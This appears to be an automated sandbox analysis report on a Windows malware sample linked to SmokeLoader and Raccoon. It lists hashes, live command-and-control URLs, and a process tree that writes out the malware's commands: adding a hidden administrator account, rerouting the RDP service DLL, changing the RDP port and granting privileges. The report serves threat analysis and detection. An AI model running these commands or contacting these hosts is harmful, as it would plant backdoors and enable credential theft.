Analysis
-
max time kernel
151s -
max time network
157s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
19-10-2021 15:33
Static task
static1
Behavioral task
behavioral1
Sample
22c4ade2ee72ea363563416dbb0b28f0.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
22c4ade2ee72ea363563416dbb0b28f0.exe
Resource
win10-en-20210920
General
-
Target
22c4ade2ee72ea363563416dbb0b28f0.exe
-
Size
259KB
-
MD5
22c4ade2ee72ea363563416dbb0b28f0
-
SHA1
b390af965c6917e886d62b882d1725d3a4ff39af
-
SHA256
22b13294437f3dc3266f4517bf126e7f3b84d96c05f299f41a59887f7710338c
-
SHA512
a7b2f134dad8cfe355c65bef6c9c22bab6d989f1eef1637ec6be71b51df705ee445139503cdf97f0b50076550e90336620a031c2925a11c642a18c34fd87d4f1
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Extracted
raccoon
41060006b048ab05e30c36a645c3317ac285b336
-
url4cnc
http://telegatt.top/agre4fanfinal
http://telegka.top/agre4fanfinal
http://telegin.top/agre4fanfinal
https://t.me/agre4fanfinal
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid Process procid_target PID 3792 created 3212 3792 WerFault.exe 81 -
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid Process 74 2444 powershell.exe 76 2444 powershell.exe 77 2444 powershell.exe 78 2444 powershell.exe 80 2444 powershell.exe 82 2444 powershell.exe 84 2444 powershell.exe 86 2444 powershell.exe 88 2444 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
70A8.exe971C.exeA527.exepid Process 2052 70A8.exe 3212 971C.exe 3988 A527.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule behavioral2/files/0x0002000000015295-393.dat upx behavioral2/files/0x00020000000152d8-394.dat upx -
Deletes itself 1 IoCs
Processes:
pid Process 1588 -
Loads dropped DLL 2 IoCs
Processes:
pid Process 1304 1304 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc Process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE388.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_h5m1tjac.03k.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE328.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE399.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_mahck2vc.f5k.psm1 powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE377.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE3A9.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 3792 3212 WerFault.exe 81 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
22c4ade2ee72ea363563416dbb0b28f0.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 22c4ade2ee72ea363563416dbb0b28f0.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 22c4ade2ee72ea363563416dbb0b28f0.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 22c4ade2ee72ea363563416dbb0b28f0.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 80 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 76 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 77 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 78 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
22c4ade2ee72ea363563416dbb0b28f0.exepid Process 2384 22c4ade2ee72ea363563416dbb0b28f0.exe 2384 22c4ade2ee72ea363563416dbb0b28f0.exe 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 1588 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid Process 1588 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid Process 636 636 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
22c4ade2ee72ea363563416dbb0b28f0.exepid Process 2384 22c4ade2ee72ea363563416dbb0b28f0.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1272 powershell.exe Token: SeDebugPrivilege 3552 powershell.exe Token: SeIncreaseQuotaPrivilege 3552 powershell.exe Token: SeSecurityPrivilege 3552 powershell.exe Token: SeTakeOwnershipPrivilege 3552 powershell.exe Token: SeLoadDriverPrivilege 3552 powershell.exe Token: SeSystemProfilePrivilege 3552 powershell.exe Token: SeSystemtimePrivilege 3552 powershell.exe Token: SeProfSingleProcessPrivilege 3552 powershell.exe Token: SeIncBasePriorityPrivilege 3552 powershell.exe Token: SeCreatePagefilePrivilege 3552 powershell.exe Token: SeBackupPrivilege 3552 powershell.exe Token: SeRestorePrivilege 3552 powershell.exe Token: SeShutdownPrivilege 3552 powershell.exe Token: SeDebugPrivilege 3552 powershell.exe Token: SeSystemEnvironmentPrivilege 3552 powershell.exe Token: SeRemoteShutdownPrivilege 3552 powershell.exe Token: SeUndockPrivilege 3552 powershell.exe Token: SeManageVolumePrivilege 3552 powershell.exe Token: 33 3552 powershell.exe Token: 34 3552 powershell.exe Token: 35 3552 powershell.exe Token: 36 3552 powershell.exe Token: SeDebugPrivilege 1644 powershell.exe Token: SeShutdownPrivilege 1588 Token: SeCreatePagefilePrivilege 1588 Token: SeShutdownPrivilege 1588 Token: SeCreatePagefilePrivilege 1588 Token: SeShutdownPrivilege 1588 Token: SeCreatePagefilePrivilege 1588 Token: SeIncreaseQuotaPrivilege 1644 powershell.exe Token: SeSecurityPrivilege 1644 powershell.exe Token: SeTakeOwnershipPrivilege 1644 powershell.exe Token: SeLoadDriverPrivilege 1644 powershell.exe Token: SeSystemProfilePrivilege 1644 powershell.exe Token: SeSystemtimePrivilege 1644 powershell.exe Token: SeProfSingleProcessPrivilege 1644 powershell.exe Token: SeIncBasePriorityPrivilege 1644 powershell.exe Token: SeCreatePagefilePrivilege 1644 powershell.exe Token: SeBackupPrivilege 1644 powershell.exe Token: SeRestorePrivilege 1644 powershell.exe Token: SeShutdownPrivilege 1644 powershell.exe Token: SeDebugPrivilege 1644 powershell.exe Token: SeSystemEnvironmentPrivilege 1644 powershell.exe Token: SeRemoteShutdownPrivilege 1644 powershell.exe Token: SeUndockPrivilege 1644 powershell.exe Token: SeManageVolumePrivilege 1644 powershell.exe Token: 33 1644 powershell.exe Token: 34 1644 powershell.exe Token: 35 1644 powershell.exe Token: 36 1644 powershell.exe Token: SeDebugPrivilege 2196 powershell.exe Token: SeIncreaseQuotaPrivilege 2196 powershell.exe Token: SeSecurityPrivilege 2196 powershell.exe Token: SeTakeOwnershipPrivilege 2196 powershell.exe Token: SeLoadDriverPrivilege 2196 powershell.exe Token: SeSystemProfilePrivilege 2196 powershell.exe Token: SeSystemtimePrivilege 2196 powershell.exe Token: SeProfSingleProcessPrivilege 2196 powershell.exe Token: SeIncBasePriorityPrivilege 2196 powershell.exe Token: SeCreatePagefilePrivilege 2196 powershell.exe Token: SeBackupPrivilege 2196 powershell.exe Token: SeRestorePrivilege 2196 powershell.exe Token: SeShutdownPrivilege 2196 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid Process 1588 1588 -
Suspicious use of SendNotifyMessage 5 IoCs
Processes:
pid Process 1588 1588 1588 1588 1588 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
70A8.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid Process procid_target PID 1588 wrote to memory of 2052 1588 73 PID 1588 wrote to memory of 2052 1588 73 PID 2052 wrote to memory of 1272 2052 70A8.exe 75 PID 2052 wrote to memory of 1272 2052 70A8.exe 75 PID 1272 wrote to memory of 1936 1272 powershell.exe 77 PID 1272 wrote to memory of 1936 1272 powershell.exe 77 PID 1936 wrote to memory of 2012 1936 csc.exe 78 PID 1936 wrote to memory of 2012 1936 csc.exe 78 PID 1272 wrote to memory of 3552 1272 powershell.exe 79 PID 1272 wrote to memory of 3552 1272 powershell.exe 79 PID 1588 wrote to memory of 3212 1588 81 PID 1588 wrote to memory of 3212 1588 81 PID 1588 wrote to memory of 3212 1588 81 PID 1272 wrote to memory of 1644 1272 powershell.exe 83 PID 1272 wrote to memory of 1644 1272 powershell.exe 83 PID 1588 wrote to memory of 3988 1588 85 PID 1588 wrote to memory of 3988 1588 85 PID 1588 wrote to memory of 3988 1588 85 PID 1272 wrote to memory of 2196 1272 powershell.exe 87 PID 1272 wrote to memory of 2196 1272 powershell.exe 87 PID 1272 wrote to memory of 3396 1272 powershell.exe 91 PID 1272 wrote to memory of 3396 1272 powershell.exe 91 PID 1272 wrote to memory of 2056 1272 powershell.exe 92 PID 1272 wrote to memory of 2056 1272 powershell.exe 92 PID 1272 wrote to memory of 2444 1272 powershell.exe 93 PID 1272 wrote to memory of 2444 1272 powershell.exe 93 PID 1272 wrote to memory of 3592 1272 powershell.exe 94 PID 1272 wrote to memory of 3592 1272 powershell.exe 94 PID 3592 wrote to memory of 3580 3592 net.exe 95 PID 3592 wrote to memory of 3580 3592 net.exe 95 PID 1272 wrote to memory of 4060 1272 powershell.exe 96 PID 1272 wrote to memory of 4060 1272 powershell.exe 96 PID 4060 wrote to memory of 3708 4060 cmd.exe 97 PID 4060 wrote to memory of 3708 4060 cmd.exe 97 PID 3708 wrote to memory of 1424 3708 cmd.exe 98 PID 3708 wrote to memory of 1424 3708 cmd.exe 98 PID 1424 wrote to memory of 2000 1424 net.exe 99 PID 1424 wrote to memory of 2000 1424 net.exe 99 PID 1272 wrote to memory of 2252 1272 powershell.exe 100 PID 1272 wrote to memory of 2252 1272 powershell.exe 100 PID 2252 wrote to memory of 3096 2252 cmd.exe 101 PID 2252 wrote to memory of 3096 2252 cmd.exe 101 PID 3096 wrote to memory of 3056 3096 cmd.exe 102 PID 3096 wrote to memory of 3056 3096 cmd.exe 102 PID 3056 wrote to memory of 3736 3056 net.exe 103 PID 3056 wrote to memory of 3736 3056 net.exe 103 PID 3500 wrote to memory of 668 3500 cmd.exe 107 PID 3500 wrote to memory of 668 3500 cmd.exe 107 PID 668 wrote to memory of 1072 668 net.exe 108 PID 668 wrote to memory of 1072 668 net.exe 108 PID 3848 wrote to memory of 2744 3848 cmd.exe 111 PID 3848 wrote to memory of 2744 3848 cmd.exe 111 PID 2744 wrote to memory of 3396 2744 net.exe 112 PID 2744 wrote to memory of 3396 2744 net.exe 112 PID 2056 wrote to memory of 1972 2056 cmd.exe 115 PID 2056 wrote to memory of 1972 2056 cmd.exe 115 PID 1972 wrote to memory of 2372 1972 net.exe 118 PID 1972 wrote to memory of 2372 1972 net.exe 118 PID 4056 wrote to memory of 844 4056 cmd.exe 119 PID 4056 wrote to memory of 844 4056 cmd.exe 119 PID 844 wrote to memory of 2328 844 net.exe 123 PID 844 wrote to memory of 2328 844 net.exe 123 PID 3600 wrote to memory of 3200 3600 cmd.exe 120 PID 3600 wrote to memory of 3200 3600 cmd.exe 120
Processes
-
C:\Users\Admin\AppData\Local\Temp\22c4ade2ee72ea363563416dbb0b28f0.exe"C:\Users\Admin\AppData\Local\Temp\22c4ade2ee72ea363563416dbb0b28f0.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2384
-
C:\Users\Admin\AppData\Local\Temp\70A8.exeC:\Users\Admin\AppData\Local\Temp\70A8.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i5lloxgb\i5lloxgb.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86DF.tmp" "c:\Users\Admin\AppData\Local\Temp\i5lloxgb\CSCDB210062FFC440A2A3D4A47A8F313F86.TMP"4⤵PID:2012
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3396
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2056
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2444
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3580
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2000
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3736
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2284
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:660
-
-
-
C:\Users\Admin\AppData\Local\Temp\971C.exeC:\Users\Admin\AppData\Local\Temp\971C.exe1⤵
- Executes dropped EXE
PID:3212 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 9602⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:3792
-
-
C:\Users\Admin\AppData\Local\Temp\A527.exeC:\Users\Admin\AppData\Local\Temp\A527.exe1⤵
- Executes dropped EXE
PID:3988
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1072
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 39lXC91r /add1⤵
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 39lXC91r /add2⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 39lXC91r /add3⤵PID:3396
-
